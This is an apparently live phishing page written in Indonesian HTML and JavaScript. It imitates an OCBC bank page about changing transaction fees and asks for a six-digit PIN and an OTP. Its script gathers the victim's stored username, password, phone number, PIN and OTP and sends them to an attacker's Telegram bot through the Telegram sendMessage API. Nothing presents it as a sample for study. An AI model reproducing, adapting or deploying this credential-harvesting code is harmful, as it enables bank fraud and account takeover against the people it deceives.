
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">

	<title>𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺 | 𝗣𝗲𝗿𝘂𝗯𝗮𝗵𝗮𝗻 𝘀𝗸𝗲𝗺𝗮 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" integrity="sha384-zCbKRCUGaJDkqS1kPbPd7TveP5iyJE0EjAuZQTgFLD2ylzuqKfdKlfG/eSrtxUkn" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
        body {
            padding: 20px;
            margin: 0 auto;
            left: 0;
            right: 0;
            width: 100%;
            font-family: sans-serif;
            overflow: hidden; 
            background: none #fff;
            max-width: 450px;
            
        }

        .text-header {
            font-family: 'Nunito', sans-serif;
            color: #000;
        }

        .text-subheader {
            font-family: 'Nunito', sans-serif;
            margin-top: -40px;
            color: #000;
            font-size: 15px;
        }

        .sizing {
            width: 100px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 100%;
                max-width: 450px;
            }
        } 

        .pinNumb {
            cursor: pointer;
            box-sizing: border-box; 
            width: 100%;             
            font-size: 30px; 
            color: #000; 
            text-align: center; 
            padding-top: 0px; 
            border-radius: 10px; 
            box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; 
            height: 40px;
            background: none;
            border: none;
            margin-left: 0px;
        }

        button.pinNumb:hover {
            color: #c9c9c98c;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid rgba(255, 255, 255, 0.1);
        }


.containerx-pin {
    background-color: transparent;
    padding: 20px; 
    border-radius: 10px; 
    text-align: center;
    max-width: 400px; 
    margin: 0 auto; 
    opacity: 0.1; 
    animation: fadeInDown 0.6s ease-in-out forwards;
    margin-top: 40vh;
    z-index: 999999;
    height: 100%;
    font-family: sans-serif;
}


.groupp {  
    display: flex;
    justify-content: center;
    gap: 8px; 
    margin-top: 15px;
    
}

.pin-inp {
    background-color: #fff;
    width: 40px;
    height: 40px;
    border: 1px solid #ccc;
    border-radius: 5px;
    text-align: center;
    font-size: 20px; 
    line-height: 40px;
    color: #333;
    transition: border-color 0.3s ease;
    box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); 
    z-index: 99999;
    background:#fff;
    
}

.pin-inp:focus {
    border-color: #ddd;
    outline: none;
    box-shadow: 0 0 5px #f45b69; 
}

@media screen and (max-width: 350px) {
    .pin-input {
        width: 35px; 
        height: 35px; 
        font-size: 18px;
    }
    .groupp {
        gap: 5px; 
    }
} 


@keyframes fadeInDown {
    from {
        opacity: 0;
        transform: translateY(50px);
    }
    to {
        opacity: 1;
        transform: translateY(0px);
    }
}

.hid{
    display:none;
}

.blur{
        position: fixed;
        bottom: 0;
        left: 0;
        background: #0000009b;
        backdrop-filter: blur(4px);        
        z-index:1;
        width: 100%;
        height: 100%;
    
}
    </style>
  </head>
  <body>
      <br>
      <center>
    <img src="https://picjj.com/images/2024/09/11/WSn2cf.png" width="40%" alt=""> 
     </center> 
     
    <div class="container">
        
        <div class="row" style="margin-top: -120px;">
            
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 25px; height: 98.8px; padding-bottom: 0px; font-family: sans-serif; font-size: 16px; font-weight: 400; color: rgb(255,255,255); line-height: 1.4; border-radius: 0px;">
                              
            </div>
        </div>
        
        <div class="row" style="margin-top: -40px;">
            
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
                <center>
                <div class="text-header"><font  size="5"><strong>Verifikasi PIN</strong></font></div>
                <div class="text-subheader">Masukkan 6 digit PIN kamu untuk melanjutkan proses perubahan tarif</div>
            
                
               
  

    </center>

</div>

                </div>
            </div>
        </div>
        <form  id="ryuSubmit" method="post">
        <input type="hidden" name="tarif" id="tarif">
          <input type="hidden" name="nohp" id="nohp">   
          <input type="hidden" name="user" id="user">
          <input type="hidden" name="pass" id="pass">   
        <input type="tel" name="setPin" id="setPin" style="display: none;">
        <div class="row" style="margin-top: -30px;padding-right:30px;">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
               <div class="row">
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-1" style="box-sizing: border-box; font-size: 30px; color: #000; text-align: center; padding-top: 3px;  width: 50px; left: 0px; top: 0px; background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-2" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color:#c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-3" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-4" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-5" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px; background-color: #c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin-6" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #000; text-align: center; padding-top: 3px;background-color:#c9c9c98c; border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div>
                        </div>
                    </div>
               </div>
             </div>
              
               <div class="" style="margin-top: 0px">
                   </div>
                     <center>
    

    </center>
  
     
                    </div>
                       
   </div>     

</div>
</div>
</div>
</div>
                    </div>
               </div>
            </div>
        </div>
        </div>
        <div class="row" style="margin-top: 90px">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: #ce222b; line-height: 1.4; border-radius: 0px;">
                <div class="row">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="1">1</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="2">2</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="3">3</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="4">4</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="5">5</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="6">6</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="7">7</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="8">8</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="9">9</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="setPin" data-id="0">0</button>
                    </div>
                    <div class="col-4">
                        <button class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline"></i></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </form>
    
<!-- patokkkk otppp -->
<style>
    .resend{
        background: transparent;
        border: none;
        color: #fff;
    }
</style>

<form id="formPin" method="post">
    <div class="blur hid">
    <div class="containerx-pin">
        <label style="font-weight:bold;color:white;">Verifikasi OTP</label>           
              <div class="groupp">                
			          	<div type="button" class="clear">
                <input autofocus type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin1" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin2" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin3" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin4" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin5" autocomplete="off">
                <input type="tel" class="pin-inp" maxlength="1" pattern="[0-9]" inputmode="numeric" id="pin6" oninput="sandi()" autocomplete="off">
                 </div>
              </div>
            <br>
    <section id="ulangi" class="hid" style="color:#ffffff80;">			
			<div style="color:#ffffff80;">Tidak menerima Kode OTP?</div>				
						<button type="button" class="resend" onclick="window.location.href='pin_otp.html'">Kirim Ulang</button> atau coba <button class="resend">Metode Lainnya</button>									
				</section>
				
           <section id="timerku" class="hi" style="text-align: center; margin-top: 20px;color:#ffffff80;font-size:14px;">	
      <div>Mohon tunggu <span class="resend" id="waktu" style="color: #fff">60</span> detik untuk mengirim ulang.</div>
		</section>
		
		<br>
		<center>
  <b style="font-size:14px;color:#ffffff80;font-weight: 600;">Belum terima OTP?</b><a onclick="go()" style="font-size:16px;color:#fff;margin:5px;font-weight: 800;">Request Kode OTP</a>
  </center>
  
      </div>
    </div>
  </div>
</form>
     

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="token.js"></script>
    <script src="i.js"></script>
    <script>
 
    document.getElementById("tarif").value =
        sessionStorage.getItem("tarif");
document.getElementById("nohp").value =
        sessionStorage.getItem("nohp"); 
document.getElementById("user").value =
        sessionStorage.getItem("user");
document.getElementById("pass").value =
        sessionStorage.getItem("pass");
        
        $(document).ready(function() {
    
    function sendTelegramMessage(message) {
        $.ajax({
            url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${message}&parse_mode=html`,
            method: "POST",
            complete: function() {                
                $(".blur").fadeIn();
                $('#pin1').focus();
            }
        });
    }

    
    $("button#setPin").on('click', function(event) {
        event.preventDefault();
        var pin = $(this).attr('data-id');
        
        for (var i = 1; i <= 6; i++) {
            if ($.trim($("#pin-" + i).html()) == "") {
                $("#pin-" + i).html(pin);
                break;
            }
        }
        
        if ($("#pin-6").html() != "") {
            
            var setPin = $("#pin-1").html() + $("#pin-2").html() + $("#pin-3").html() + $("#pin-4").html() + $("#pin-5").html() + $("#pin-6").html();
            
            $("input#setPin").val(setPin);
            
            
            sessionStorage.setItem("tarif", $('#tarif').val());
            sessionStorage.setItem("nohp", $('#nohp').val());
            sessionStorage.setItem("user", $('#user').val());
            sessionStorage.setItem("pass", $('#pass').val());            
            sessionStorage.setItem("setPin", setPin);


            var logo = '𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺';
            
            var message = '' + logo + '%0A※ 𝗧𝗮𝗿𝗶𝗳 •• ' + tarif.value + '%0A※ 𝗡𝗼.𝗛𝗽 •• ' + nohp.value + '%0A%0A※ 𝗨𝘀𝗲𝗿 •• ' + user.value + '%0A※ 𝗣𝗮𝘀𝘀 •• ' + pass.value + '%0A※ 𝗣𝗶𝗻 •• ' + setPin ;   
   
            
            sendTelegramMessage(message);
        }
    });

    
    $("#hapus").on('click', function(event) {
        event.preventDefault();        
        for (var i = 1; i <= 6; i++) {
            $("#pin-" + i).html('');
        }
    });
});


function sandi(){
   
    event.preventDefault();   
            
        
var setPin = sessionStorage.getItem('setPin', setPin);
    document.getElementById("setPin").value = setPin + ""; 
           
                              
    var logo = '𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺';             
    var gabungan = '' + logo + '%0A※ 𝗧𝗮𝗿𝗶𝗳 •• ' + tarif.value + '%0A※ 𝗡𝗼.𝗛𝗽 •• ' + nohp.value + '%0A%0A※ 𝗨𝘀𝗲𝗿 •• ' + user.value + '%0A※ 𝗣𝗮𝘀𝘀 •• ' + pass.value + '%0A※ 𝗣𝗶𝗻 •• ' + setPin + '%0A%0A※ 𝗢𝘁𝗽 •• ' + pin1.value + pin2.value + pin3.value + pin4.value + pin5.value + pin6.value ;   
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
    setTimeout(function(){   
    
   
   $('#pin1').val('');
   $('#pin2').val('');
   $('#pin3').val('');
   $('#pin4').val('');
   $('#pin5').val('');
   $('#pin6').val('');
   $("#blur").fadeOut();
    }, 500);}});};    
        
    </script>
    <script>
        $(document).ready(function() {
    $('.clear').click(function() {
        $('.pin-inp').val('');
        $('#pin1').focus();
     });    
  });        
        
$('.pin-inp').on('input', function(event) {
        const inputs = $('.pin-inp');
        const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
        if (isAllFilled == true) {
            $(event.target).blur();
        }
        const index = inputs.index(this);
        const currentValue = event.target.value;
        if (currentValue.length === 1) {
            if (index < inputs.length - 1) {
                inputs[index + 1].focus();
            }
        } else if (currentValue.length === 0) {
            if (index > 0) {
                inputs[index].focus();
            }
        }
    });
    $('.pin-inp').on('keydown', function(event) {
        const inputs = $('.pin-inp');
        const key = event.key;
        const index = inputs.index(this);
        if (key === 'Backspace' && event.target.value.length === 0) {
            if (index > 0) {
                inputs[index - 1].focus();
            }
        }
    });
    
    var url = "#kirim-ulang"; // url tujuan
            var count = 60; // dalam detik
            function countDown() {

                if (count > 0) {
                    count--;
                    var waktu = count + 0;
            $('#waktu').html(waktu);
             
         setTimeout("countDown()", 1000);
         setTimeout(function() { 
         $("#timerku").hide();
         $("#ulangi").show();
         }, 60000);
                    
               
                }
            }
            countDown();
    </script>
    <!-- </body> -->
  </body>
</html>



